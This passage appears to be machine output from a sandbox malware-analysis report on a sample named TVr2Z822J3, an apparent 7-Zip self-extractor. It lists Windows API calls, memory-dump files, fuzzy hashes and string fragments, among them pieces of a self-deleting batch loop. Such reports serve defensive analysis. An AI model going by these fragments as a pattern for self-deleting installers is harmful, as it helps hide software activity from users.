                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C7E
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00406437,?), ref: 00404C84
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00406437,?,?,?,?,?,?,?,?,?,?,?,?,?,00406437,004177C4), ref: 00404CB2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                                                                                  • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                                                                                  • API String ID: 3007203151-3467708659
                                                                                                                  • Opcode ID: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                                                                                                  • Instruction ID: 7a4c4b622d76ac6c1822c64a370ea4e05d699ec4102568342bfcf68b8c9639ad
                                                                                                                  • Opcode Fuzzy Hash: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                                                                                                  • Instruction Fuzzy Hash: DE416171D01119BADB00EBA5ED85DEEBB78EF44358F50803AF511720E1EB78AE85CB58
                                                                                                                  APIs
                                                                                                                  • lstrcmpiW.KERNEL32(00000000,0041442C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004046DF
                                                                                                                    • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                                                                    • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                                                                                    • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                                                                    • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                                                                                    • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                                                                    • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                                                                    • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                                                                                    • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                                                                    • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                                                                    • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                                                                                    • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                                                                    • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                                                                    • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                                                                  • _wtol.MSVCRT ref: 004047DC
                                                                                                                  • _wtol.MSVCRT ref: 004047F8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                                                                                  • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$|wA
                                                                                                                  • API String ID: 2725485552-3187639848
                                                                                                                  • Opcode ID: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                                                                                                  • Instruction ID: a5d789275b7dd46d140941e9fd319bf554fc7ea6ad5da08365fcb0f0a182a74d
                                                                                                                  • Opcode Fuzzy Hash: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                                                                                                  • Instruction Fuzzy Hash: 4251B5F1A402047EDB10BB619D86EFF36ACDA85308B64443BF904F32C1E6BC5E854A6D
                                                                                                                  APIs
                                                                                                                  • GetClassNameA.USER32(?,?,00000040), ref: 00402DD3
                                                                                                                  • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402DE6
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00402DF3
                                                                                                                    • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                                                                    • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                                                                    • Part of subcall function 00401A85: CharUpperW.USER32(?,771AE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                                                                    • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402E20
                                                                                                                  • GetParent.USER32(?), ref: 00402E2E
                                                                                                                  • LoadLibraryA.KERNEL32(riched20), ref: 00402E42
                                                                                                                  • GetMenu.USER32(?), ref: 00402E55
                                                                                                                  • SetThreadLocale.KERNEL32(00000419), ref: 00402E62
                                                                                                                  • CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
                                                                                                                  • DestroyWindow.USER32(?), ref: 00402EA3
                                                                                                                  • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00402EBC
                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00402ECA
                                                                                                                  • SendMessageW.USER32(00000000,00000461,?,?), ref: 00402EF5
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402EFA
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402F02
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$??3@MessageSend$CharTextUpper$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                                                                  • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                                                                  • API String ID: 1731037045-2281146334
                                                                                                                  • Opcode ID: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                                                                                                  • Instruction ID: c7c9ca1f65d7473fe19c29f8272bdbb18bb8b251efb89c9ee4785ec66c96c850
                                                                                                                  • Opcode Fuzzy Hash: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                                                                                                  • Instruction Fuzzy Hash: FE316072A40119BFDB01AFA5DD49DEF7BBCEF08745F104036F601B21D1DA789A008B68
                                                                                                                  APIs
                                                                                                                  • GetWindowDC.USER32(00000000), ref: 00401CD4
                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                                                                                  • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                                                                                  • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                                                                                  • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401D60
                                                                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                                                                                  • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                                                                                  • GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00401DC2
                                                                                                                  • DeleteDC.GDI32(00000000), ref: 00401DC5
                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00401DDB
                                                                                                                  • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401DE8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3462224810-0
                                                                                                                  • Opcode ID: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                                                                                                  • Instruction ID: 24730f8ff9b6a3f8d7f0600a39c6f646a54ca28d21b12e05547a6914d757f366
                                                                                                                  • Opcode Fuzzy Hash: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                                                                                                  • Instruction Fuzzy Hash: 00313976D00208BBDF215FA19C48EEFBFBDEB48752F108066F604B21A0C6758A50EB64
                                                                                                                  APIs
                                                                                                                  • GetClassNameA.USER32(?,?,00000040), ref: 00401E05
                                                                                                                  • lstrcmpiA.KERNEL32(?,STATIC), ref: 00401E1C
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00401E2F
                                                                                                                  • GetMenu.USER32(?), ref: 00401E44
                                                                                                                    • Part of subcall function 00401BDF: GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                                                                                    • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                                                                                    • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                                                                                    • Part of subcall function 00401BDF: SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                                                                                    • Part of subcall function 00401BDF: LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                                                                                    • Part of subcall function 00401BDF: LockResource.KERNEL32(00000000), ref: 00401C41
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00401E76
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000010), ref: 00401E83
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00401E8C
                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00401E98
                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00414C14,?), ref: 00401EBD
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00401ECD
                                                                                                                    • Part of subcall function 00401CC8: GetWindowDC.USER32(00000000), ref: 00401CD4
                                                                                                                    • Part of subcall function 00401CC8: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                                                                                    • Part of subcall function 00401CC8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                                                                                    • Part of subcall function 00401CC8: GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                                                                                    • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                                                                                    • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                                                                                    • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                                                                                    • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                                                                                    • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401D60
                                                                                                                    • Part of subcall function 00401CC8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                                                                                    • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                                                                                    • Part of subcall function 00401CC8: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                                                                                    • Part of subcall function 00401CC8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                                                                                    • Part of subcall function 00401CC8: GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                                                                                    • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                                                                                    • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                                                                                    • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC2
                                                                                                                    • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC5
                                                                                                                    • Part of subcall function 00401CC8: ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00401EFF
                                                                                                                  • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 00401F13
                                                                                                                  • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00401F3A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                                                                  • String ID: IMAGES$STATIC
                                                                                                                  • API String ID: 4202116410-1168396491
                                                                                                                  • Opcode ID: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                                                                                  • Instruction ID: 08c73d75f8249df6a552952f3d33af28cabbedea74541c6d0cfd8ce2793c0c4e
                                                                                                                  • Opcode Fuzzy Hash: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                                                                                                  • Instruction Fuzzy Hash: C7417C71A00218BFCB11DFA1DC49DEEBF7DEF08742B008076FA05A61A0DB758A41DB68
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                                                                    • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                                                                  • GetDlgItem.USER32(?,000004B8), ref: 0040816A
                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408179
                                                                                                                  • GetDlgItem.USER32(?,000004B5), ref: 004081C0
                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 004081C5
                                                                                                                  • GetDlgItem.USER32(?,000004B5), ref: 004081D5
                                                                                                                  • SetWindowLongW.USER32(00000000), ref: 004081D8
                                                                                                                  • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004081FE
                                                                                                                  • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408210
                                                                                                                  • GetDlgItem.USER32(?,000004B4), ref: 0040821A
                                                                                                                  • SetFocus.USER32(00000000), ref: 0040821D
                                                                                                                  • SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040824C
                                                                                                                  • CoCreateInstance.OLE32(00414C34,00000000,00000001,00414808,00000000), ref: 00408277
                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00408294
                                                                                                                  • IsWindow.USER32(00000000), ref: 00408297
                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 004082A7
                                                                                                                  • EnableWindow.USER32(00000000), ref: 004082AA
                                                                                                                  • GetDlgItem.USER32(?,000004B5), ref: 004082BE
                                                                                                                  • ShowWindow.USER32(00000000), ref: 004082C1
                                                                                                                    • Part of subcall function 00407134: GetDlgItem.USER32(?,000004B6), ref: 00407142
                                                                                                                    • Part of subcall function 00407B33: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                                                                                                    • Part of subcall function 00407B33: GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                                                                                    • Part of subcall function 00407B33: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                                                                                    • Part of subcall function 00407B33: wsprintfW.USER32 ref: 00407BBB
                                                                                                                    • Part of subcall function 00407B33: ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                                                                                                    • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                                                                    • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                                                                                    • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                                                                    • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                                                                    • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                                                                    • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                                                                                    • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                                                                    • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                                                                    • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                                                                                    • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Item$Window$MessageSend$System$EnableHandleLoadLongMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 855516470-0
                                                                                                                  • Opcode ID: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                                                                                  • Instruction ID: 3ce0214ef3d03b0ee840dd4ab9c121ae631e901bc0d6870238ad5b6e85178a64
                                                                                                                  • Opcode Fuzzy Hash: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                                                                                                  • Instruction Fuzzy Hash: 014174B0644748ABDA206F65DD49F5B7BADEB40B05F00847DF552A62E1CB79B800CA1C
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,hAA,00000000), ref: 004030F6
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,hAA,00000000), ref: 004030FE
                                                                                                                  • strncmp.MSVCRT ref: 004031F1
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00403255
                                                                                                                  • lstrcmpW.KERNEL32(?,SetEnvironment,00000000), ref: 00403273
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@$lstrcmpstrncmp
                                                                                                                  • String ID: GUIFlags$MiscFlags$SetEnvironment$hAA${\rtf
                                                                                                                  • API String ID: 2881732429-172299233
                                                                                                                  • Opcode ID: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                                                                                                  • Instruction ID: da55d09168dcf28f6e950782b6654b171f18f9ca5632fa18d2c46afc5d57570a
                                                                                                                  • Opcode Fuzzy Hash: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                                                                                                  • Instruction Fuzzy Hash: 23819D31900218ABDF11DFA1CD55BEE7B78AF14305F1040ABE8017B2E6DB78AB05DB59
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000004B3), ref: 00406A69
                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00406A6E
                                                                                                                  • GetDlgItem.USER32(?,000004B4), ref: 00406AA5
                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00406AAA
                                                                                                                  • GetSystemMetrics.USER32(00000010), ref: 00406B0B
                                                                                                                  • GetSystemMetrics.USER32(00000011), ref: 00406B11
                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 00406B18
                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00406B1F
                                                                                                                  • GetParent.USER32(?), ref: 00406B43
                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00406B55
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00406B68
                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00406BCE
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00406C55
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00406B71
                                                                                                                    • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                                                                                  • GetSystemMetrics.USER32(00000008), ref: 00406CD6
                                                                                                                  • GetSystemMetrics.USER32(00000007), ref: 00406CDD
                                                                                                                    • Part of subcall function 00406A18: GetDlgItem.USER32(?,?), ref: 00406A36
                                                                                                                    • Part of subcall function 00406A18: SetWindowPos.USER32(00000000), ref: 00406A3D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363824745.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363879852.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_6_2_400000_TVr2Z822J3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 747815384-0
                                                                                                                  • Opcode ID: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                                                                                                  • Instruction ID: 701d8c843d4ec3579feae24e97f284edc15b0bac0439a5efdbaa5111af673c9b
                                                                                                                  • Opcode Fuzzy Hash: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                                                                                                  • Instruction Fuzzy Hash: 7B912D71A00209AFDB14DFB9CD85AEEB7F9EF48704F148529E642F6290D778E9008B64
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                                                                  • LoadIconW.USER32(00000000), ref: 00407D33
                                                                                                                  • GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                                                                  • GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                                                                  • LoadImageW.USER32(00000000), ref: 00407D54
                                                                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                                                                  • GetWindow.USER32(?,00000005), ref: 00407E76
                                                                                                                  • GetWindow.USER32(?,00000005), ref: 00407E92
                                                                                                                  • GetWindow.USER32(?,00000005), ref: 00407EAA
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,0040803E), ref: 00407F0A
                                                                                                                  • LoadIconW.USER32(00000000), ref: 00407F0D
                                                                                                                  • GetDlgItem.USER32(?,000004B1), ref: 00407F28
                                                                                                                  • SendMessageW.USER32(00000000), ref: 00407F2F
                                                                                                                    • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                                                                                    • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                                                                                    • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                                                                    • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000006.00000002.1363746431.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000006.00000002.1363710995.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000006.00000002.1363767558.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
